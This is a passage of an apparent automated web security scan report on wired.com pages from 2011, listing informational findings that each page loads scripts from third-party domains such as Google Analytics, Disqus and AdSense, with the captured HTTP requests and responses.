<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+5adfe3154fe6860740d960e4d28725c620795551+1294845355"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.56. http://www.wired.com/reviews/category/notebooks-and-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/notebooks-and-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+0a3a1ce6ce95ad4ba51b2d03446fde0159ff8296+1294845512
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/notebooks-and-accessories/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:18:32 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=476
Expires: Wed, 12 Jan 2011 15:45:44 GMT
Date: Wed, 12 Jan 2011 15:37:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+0a3a1ce6ce95ad4ba51b2d03446fde0159ff8296+1294845512"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.57. http://www.wired.com/reviews/category/roundups/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/roundups/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+47e844853076d7f854833c39c36b2b1326114536+1294843339
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/roundups/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:42:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=466
Expires: Wed, 12 Jan 2011 15:45:35 GMT
Date: Wed, 12 Jan 2011 15:37:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+47e844853076d7f854833c39c36b2b1326114536+1294843339"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.58. http://www.wired.com/reviews/category/software-and-apps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/software-and-apps/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+ef6220e1ac3b1e3ec4a5bcd3cd02936f2ee0b090+1294843079
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/software-and-apps/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:37:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=395
Expires: Wed, 12 Jan 2011 15:44:28 GMT
Date: Wed, 12 Jan 2011 15:37:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+ef6220e1ac3b1e3ec4a5bcd3cd02936f2ee0b090+1294843079"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.59. http://www.wired.com/reviews/category/sports-and-outdoors/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/sports-and-outdoors/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+117a50df36f46eee206de29c15cd64ddf42c0071+1294845776
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/sports-and-outdoors/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:22:57 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=453
Expires: Wed, 12 Jan 2011 15:45:28 GMT
Date: Wed, 12 Jan 2011 15:37:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+117a50df36f46eee206de29c15cd64ddf42c0071+1294845776"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.60. http://www.wired.com/reviews/category/tablets-and-ebook-readers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/tablets-and-ebook-readers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+4d7ad3afaeac65fdee5474407d148fb0ec694efc+1294846458
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/tablets-and-ebook-readers/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:34:19 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:45:57 GMT
Date: Wed, 12 Jan 2011 15:37:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+4d7ad3afaeac65fdee5474407d148fb0ec694efc+1294846458"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.61. http://www.wired.com/reviews/category/televisions/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/televisions/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+9668cd8773b5c7e6aa6df75a40ae2473948887df+1294843078
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/televisions/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:37:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=436
Expires: Wed, 12 Jan 2011 15:45:14 GMT
Date: Wed, 12 Jan 2011 15:37:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+9668cd8773b5c7e6aa6df75a40ae2473948887df+1294843078"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.62. http://www.wired.com/science/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/science/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /science/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=337
Expires: Wed, 12 Jan 2011 15:43:37 GMT
Date: Wed, 12 Jan 2011 15:38:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 68746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.63. http://www.wired.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/search

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google-analytics.com/urchin.js
http://www.google.com/afsonline/show_afs_search.js

Request

GET /search HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=240
Expires: Wed, 12 Jan 2011 15:45:21 GMT
Date: Wed, 12 Jan 2011 15:41:21 GMT
Content-Length: 30114
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/afsonline/show_afs_search.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.64. http://www.wired.com/services/corrections/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/services/corrections/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

6.65. http://www.wired.com/services/newsletters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/services/newsletters

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

Response

6.66. http://www.wired.com/software/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/software/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /software/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=33
Expires: Wed, 12 Jan 2011 15:38:41 GMT
Date: Wed, 12 Jan 2011 15:38:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.67. http://www.wired.com/techbiz/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/techbiz/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /techbiz/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=525
Expires: Wed, 12 Jan 2011 15:47:05 GMT
Date: Wed, 12 Jan 2011 15:38:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.68. http://www.wired.com/thisdayintech/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/thisdayintech/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /thisdayintech/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:01:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:12 GMT
Date: Wed, 12 Jan 2011 15:40:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 154245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<div class="textwidget"><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.69. http://www.wired.com/threatlevel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:21:59 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:27:52 GMT
Date: Wed, 12 Jan 2011 15:27:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.70. http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2006/04/reporter_vs_sub/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2006/04/reporter_vs_sub/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 10:06:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=600
Expires: Wed, 12 Jan 2011 15:37:41 GMT
Date: Wed, 12 Jan 2011 15:27:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 68707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2006/04/reporter_vs_sub/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.71. http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2010/12/hacking-the-hacker-stereotypes/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2010/12/hacking-the-hacker-stereotypes/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
